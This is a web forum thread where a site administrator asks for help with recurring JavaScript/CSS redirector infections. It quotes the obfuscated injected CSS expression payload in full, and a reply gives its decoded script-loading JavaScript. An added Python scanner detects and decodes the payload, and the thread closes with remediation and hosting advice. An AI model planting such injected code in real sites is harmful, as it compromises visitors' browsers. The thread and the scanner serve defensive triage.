VideoHelp Forum




  1. Member
    OK, so I run the site www.foofighterslive.com, and several files on our webspace keep getting infected with the following virus, according to various virus programs:

    exploit-PHPBB.b

    AKA:
    * JS/Redirector.A [Norman]

    * JS/Redirector.E [NOD32v2]

    * JS_REDIRECTOR.M [TrendMicro]

    * Trojan.JS.Redirector.C [BitDefender]

    * Trojan.JS.Redirector.e [Kaspersky]

    * Trojan.Redirect.10 [DrWeb]


    I clean the files and it's fine for about a week, then it comes back. It used to be .js files that were being infected with malicious code; now it seems to be .css files as well. They cause my forum to stop fully functioning, but what's confusing is that this virus seems to be related to PHPBB forum software, when we are running VBB forum software, so finding a fix via Google is hard, because all the answers point to PHPBB software. This is the code that they keep embedding in the files:

    Code:
     /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%35%37%33%35%39%34%3B%20%4A%53%53%33%20%3D%20%27%2F%77%69%6B%69%2F%73%6B%69%6E%73%2F%63%6F%6D%6D%6F%6E%2F%69%6D%61%67%65%73%2F%6F%70%61%64%61%72%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%77%69%6B%69%2F%73%6B%69%6E%73%2F%63%6F%6D%6D%6F%6E%2F%69%6D%61%67%65%73%2F%6F%70%61%64%61%72%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */
    I assume that is some sort of scrambled code; I don't really understand it. Anyone know how I can stop these exploits from coming back? How the hell do they keep managing to access these files?
  2. Member
    Contact your host provider and explain the problem. If they can't give a solid answer and effective help, find another host for your web site. You should post your host provider's name. It's possible that other forum members may have some insight about them.
  3. aBigMeanie aedipuss
    somewhere on your site you probably have an unfiltered input statement that is allowing them to hack your site.


    google -

    body { margin-top: expression(eval(unescape

    and

    htmlentities() - to help fix it
    --
    "a lot of people are better dead" - prisoner KSC2-303
  4. That code translates to:

    Code:
    if (!document.getElementById('JSSS')){ JSS1 = 59; JSS2 = 573594; JSS3 = '/wiki/skins/common/images/opadar/dummy.htm'; var js = document.createElement('script'); js.setAttribute('src', '/wiki/skins/common/images/opadar/check.js'); js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };
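The decode in the post above is exactly what a defender wants automated when triaging a compromised web tree: find every file carrying the `expression(eval(unescape('...')))` rule from the first post, percent-decode the payload the way JavaScript's `unescape()` does, and pull out the script URL it would load. The scanner below is an added example written for this thread, not code from any poster; the sample CSS it scans is constructed by re-encoding the decoded script quoted above and wrapping it in the two marker comments from the infected file.

```python
"""Find the injected CSS expression(eval(unescape(...))) block quoted in this
thread and decode it for triage.  Added example; not the forum's code."""
import re
from pathlib import Path

# The injected rule wraps a percent-encoded script in expression(eval(unescape('...'))),
# a legacy IE-only CSS feature that evaluates JavaScript when the stylesheet is applied.
INJECT_RE = re.compile(
    r"expression\(\s*eval\(\s*unescape\(\s*'([^']*)'\s*\)\s*\)\s*\)", re.IGNORECASE)
# In the sample the rule sits between two comments holding a 32-hex-digit tag.
MARKER_RE = re.compile(r"/\*\s*([0-9a-f]{32})\s*\*/")
# Once decoded, the script creates a <script> element; this pulls out its src.
SRC_RE = re.compile(r"setAttribute\(\s*'src'\s*,\s*'([^']*)'")


def js_unescape(s: str) -> str:
    """Reproduce JavaScript's unescape(): %XX and %uXXXX each become one code unit."""
    def repl(m: re.Match) -> str:
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", repl, s)


def scan_text(text: str) -> list[dict]:
    """Return one finding per injected expression(): decoded JS, loaded src, marker tags."""
    markers = MARKER_RE.findall(text)
    findings = []
    for m in INJECT_RE.finditer(text):
        decoded = js_unescape(m.group(1))
        src = SRC_RE.search(decoded)
        findings.append({
            "offset": m.start(),
            "decoded": decoded,
            "script_src": src.group(1) if src else None,
            "markers": markers,
        })
    return findings


def scan_tree(root: Path, exts=(".css", ".js", ".htm", ".html", ".php")) -> dict[str, list[dict]]:
    """Walk a downloaded copy of the site and report every file carrying the injection."""
    hits = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            found = scan_text(path.read_text(errors="replace"))
            if found:
                hits[str(path.relative_to(root))] = found
    return hits


# Constructed sample: the decoded JavaScript quoted in the thread, re-encoded the way
# unescape() expects and wrapped in the marker comments seen in the infected file.
DECODED_JS = (
    "if (!document.getElementById('JSSS')){ JSS1 = 59; JSS2 = 573594; "
    "JSS3 = '/wiki/skins/common/images/opadar/dummy.htm'; "
    "var js = document.createElement('script'); "
    "js.setAttribute('src', '/wiki/skins/common/images/opadar/check.js'); "
    "js.setAttribute('id', 'JSSS'); "
    "document.getElementsByTagName('head').item(0).appendChild(js) }; "
)
SAMPLE_CSS = (
    "/* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('"
    + "".join("%%%02X" % ord(c) for c in DECODED_JS)
    + "'))) } /* a995d2cc661fa72452472e9554b5520c */\n"
    ".clean { color: red; }\n"
)

if __name__ == "__main__":
    for f in scan_text(SAMPLE_CSS):
        print("injection at offset", f["offset"], "loads", f["script_src"])
        print("markers:", f["markers"])
        print(f["decoded"])
```

Point `scan_tree()` at an FTP download of the whole site rather than only the files the antivirus flagged; the decoded `script_src` and the marker tags give you the strings to search for in the rest of the tree and in the web server's access logs.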
  5. Member isogonic
    are you using the latest version, missing any patches or updates to it?
  6. AVG antivirus also identifies and quarantines it as "Virus identified exploit".
  7. Member
    The code posted infects computers running Internet Explorer. Just viewing this post sets off my antivirus. How about removing the code sections?
  8. Member thecoalman
    It's plain text here so it can't do anything.

    You're either being infected through an exploit in the software on your server, like Cpanel amongst others, or software you have installed yourself, like phpbb.

    If you are running the latest version of phpbb3 or phpbb2 there are no known exploits in the wild.

    If you feel it's a phpbb issue you can report it here: http://www.phpbb.com/incidents/
  9. Member
    It's not a PHPBB problem for the simple reason that we don't run that forum software and never have. We have VBulletin software.

    Anyway, I've asked the website owner to contact the host and see what they can do, but I'll look this up some more via Google.

    EDIT: Oh also

    Originally Posted by jagabo
    That code translates to:

    Code:
    if (!document.getElementById('JSSS')){ JSS1 = 59; JSS2 = 573594; JSS3 = '/wiki/skins/common/images/opadar/dummy.htm'; var js = document.createElement('script'); js.setAttribute('src', '/wiki/skins/common/images/opadar/check.js'); js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };
    Those pages it's referring to have long been removed from the site, and the database for the wiki is also gone, so how are they still using those files?

    EDIT2: Actually, I see just those files have re-appeared in the directory, and keep doing so even after deleting them. Hmm...
  10. Video Restorer lordsmurf
    Permissions on server?
  11. aBigMeanie aedipuss
    check your site access/secure user logs. your site sounds like it's "owned". they can be using it for denial of service attacks / mass spamming / hosting warez, etc.
    --
    "a lot of people are better dead" - prisoner KSC2-303
  12. I ran that code on a virtual machine running an unprotected XP and IE. It seems to force IE to use intranet security settings for extranet access.
  13. Member
    As I said above, contact your host service provider and ask for their assistance with this. If they are reputable, they will be all over this like stink on the pile. If they aren't responsive, you know everything you need to know about them. If you aren't satisfied with their response, move your site to another host. If your site / host service provider have been targeted by someone to attack, you need to be more aggressive about dealing with this than just playing with scripts and access. Some of these thugs are a lot more competent than any advice you are going to get here.
  14. Member
    Originally Posted by SCDVD
    As I said above, contact your host service provider and ask for their assistance with this. If they are reputable, they will be all over this like stink on the pile. If they aren't responsive, you know everything you need to know about them. If you aren't satisfied with their response, move your site to another host. If your site / host service provider have been targeted by someone to attack, you need to be more aggressive about dealing with this than just playing with scripts and access. Some of these thugs are a lot more competent than any advice you are going to get here.
    I have done that, thanks. Well, I haven't, but I have asked the owner to do so as a matter of urgency. The site is hosted by 1&1, so I'm sure they will be able to do something about it.

    Thanks
  15. Member thecoalman
    It's not a PHPBB problem for the simple reason that we don't run that forum software and never have.

    I understand now. The vulnerability was most likely named that because it was first used to exploit phpbb; however, many things introduced to exploit phpbb generally can work on other software. When these exploits are found they are sometimes not specific to one application.

    We have VBulletin software.
    If that is not up to date it will have exploits too. You need to keep any installation like that up to date or you're risking getting hacked. If you have a Wiki or anything else installed I'd go over everything you have and make sure you're running the latest.


    Originally Posted by SCDVD
    As I said above, contact your host service provider and ask for their assistance with this. If they are reputable, they will be all over this like stink on the pile. If they aren't responsive, you know everything you need to know about them.
    Really depends on the plan and what the issue is, if the vulnerability is in a script like phpbb or VB then it's his responsibility. If it's VPS or dedicated server you're only going to get support if you have a managed one and even then it's generally limited.
  16. Member
    vBulletin is and always has been updated to the latest version. As I said earlier, we DID have a wiki, but it was deleted along with the database for it. However, those files still keep reappearing.
  17. Member thecoalman
    If it isn't software you installed then it's server software, which would be the responsibility of your host, assuming you're on a limited shared hosting plan. As stated by many people above, contact them.
  18. aBigMeanie aedipuss
    killer3737 all it takes is one unfiltered input anywhere on the site. do you have a form people fill out with name, password, email address, etc., anywhere on the site?
    --
    "a lot of people are better dead" - prisoner KSC2-303
  19. Member
    Originally Posted by aedipuss
    killer3737 all it takes is one unfiltered input anywhere on the site. do you have a form people fill out with name, password, email address, etc., anywhere on the site?
    On the site itself no, the only form like that is within vbulletin. Anyway, this is with 1&1 now, we're waiting for their response.
  20. Member
    Goddamn, contacted 1&1, they say they won't perform the analysis, and say I need to set up an antivirus on the server. However, the server is Linux, and I need SSH access to set it up, though our contract does not include SSH access.

    Time to move on I guess, but how can I make sure we don't have a vulnerability on the site and don't get attacked again?
  21. My phpBB was hacked once but that's cause it was out of date. Put in an updated one & it's fine.

    Also, get a new host. You see, every website on that host is now infected I bet.
  22. Video Restorer lordsmurf
    1&1 has to be one of the most worthless hosts on the planet. Run away. Fast.
  23. Member
    Originally Posted by lordsmurf
    1&1 has to be one of the most worthless hosts on the planet. Run away. Fast.
    Yeah, that's something we have come to realise since going with them in Feb. 2006. Not really the right place, but any recommendations? I've been looking at a few, but a lot of them have a 'too good to be true' mantra about them. Hostmonster and Bluehost for example.

    Also to go back to my last question, is there any easy way to check my site code for vulnerabilities? I didn't originally code it myself, and I don't know that much about it. I'm pretty sure the original problem was with part of the wiki, which is no longer part of the website and wouldn't be transferred.
  24. Member
    I don't know but I bet there are web sites where hosting companies are reviewed and rated. Maybe someone here knows of rating sites for hosting companies.
  25. Member thecoalman
    Originally Posted by Killer3737
    but a lot of them have a 'too good to be true' mantra about them. Hostmonster and Bluehost for example.
    Any hosting package with 6 gazillion GBs of storage and bandwidth is just a gimmick. These are usually in the $5 to $10 range. It's shared hosting and they know that 99% of the people that purchase them will never even come close to using those resources. The hidden limits, specifically CPU usage, are where the true limits of these packages are. Anything dynamic like a forum, blog, wiki etc. is going to use CPU.


    Having said that get a starter VPS: http://www.jaguarpc.com/forums/showthread.php?t=20278

    Every JaguarPC Managed VPS Hosting plan includes:
    + Quad core Nodes
    + Large RAID10 drive arrays - great I/O disk performance
    + Full root/administrator access
    + JagPC Fully Managed Support + 24x7
    + 30 Day Money Back Guarantee
    + FREE Daily backups via large R1Soft ECDP NAS appliances
    + FREE Moving assistance and data transfer for moves
    + Choice of OS: CentOS, Debian, Fedora Core, Suse.
    +SPECIAL+ Extra 100% FREE: Diskspace for life on every plan
    +SPECIAL+ Extra 75% FREE: Ram for life on every plan
    +SPECIAL+ Extra 100% FREE: Bandwidth for life on every plan
    +SPECIAL+ FREE Plesk 10 domain control panel on every plan!!!
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Linux VPS HOSTING PLANS
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    DISCOVERY PLAN
    10GB Diskspace + 100% FREE = 20GB
    128MB RAM Guaranteed + 75% FREE = 224MB
    150GB Bandwidth+ 100% FREE = 300GB
    $19.97/month

    Also to go back to my last question, is there any easy way to check my site code for vulnerabilities?
    1. If you're using any software like VB I'd start with fresh files. Check any other files where users can input information, such as contact forms etc. You have to validate all input.

    2. Search through your entries for any suspicious code.
  26. You could use a website checker; there are websites that do it for free. I don't know if they scan that kind of code.
  27. aBigMeanie aedipuss
    the exploit-PHPBB.b is a general exploit of PHP, not PHPbb. any web server using unpatched/non-updated PHP can be exploited. mySQL is another exploitable host program. if the hosting company isn't on top of the patches, all their hosted sites can be infected/owned.

    the first thing i would do is change your root site access/hosting password(if you still can). then take the site down and delete all files off of the server. only upload a known clean version of the site, not a backup from the hosted site. don't install anything that accepts input until you have checked it and made sure it filters all input.

    like coalman says, unless you do a line by line check of your code, and filter all inputs you are vulnerable.
    --
    "a lot of people are better dead" - prisoner KSC2-303
  28. Video Restorer lordsmurf
    I highly suggest www.EuroVPS.com as a host. Connection times to North America are often faster than cheap servers in the USA. Support is easily one of the best in the industry. Prices are very reasonable compared to resources and support quality.
  29. I've been using www.afmu.com for about 3 years now. Great customer service and support. I only needed support once though.